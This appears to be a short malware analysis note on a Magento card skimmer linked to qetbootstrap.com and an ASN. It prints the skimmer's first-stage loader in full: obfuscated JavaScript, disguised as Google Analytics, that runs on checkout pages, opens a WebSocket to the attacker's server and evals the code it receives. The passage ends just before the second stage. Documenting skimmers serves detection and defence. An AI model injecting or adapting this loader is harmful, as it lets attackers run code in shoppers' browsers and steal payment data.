qetbootstrap.com skimmer

wss exfiltration

ASN ZERGRUSH (39622)

Sample

The first stage of the skimmer is injected into Magento files or database:


(function(i, s, h, k, l, o, c, m) {
    m['GoogleAnalyticsObjects'] = o;
    c = s.createElement(h),
    i = s.getElementsByTagName(h)[0];
    if (l.href.match(new RegExp(atob(o)))) {
        c.async = 1;
        c.src = new Function(atob(k)).call(this);
    }
}
)('jb', document, 'style', 'window.bootstrap_web = new WebSocket('wss://qetbootstrap.com:8444');window.bootstrap_web.onmessage=function(e){eval(e.data);};', window.location, 'Y2hlY2tvdXQ' + '=', '//www.google-analytics.com/analytics.js', window);

The second stage of the skimmer is loaded from an external domain and then loaded in the victim’s browser when they load the checkout page: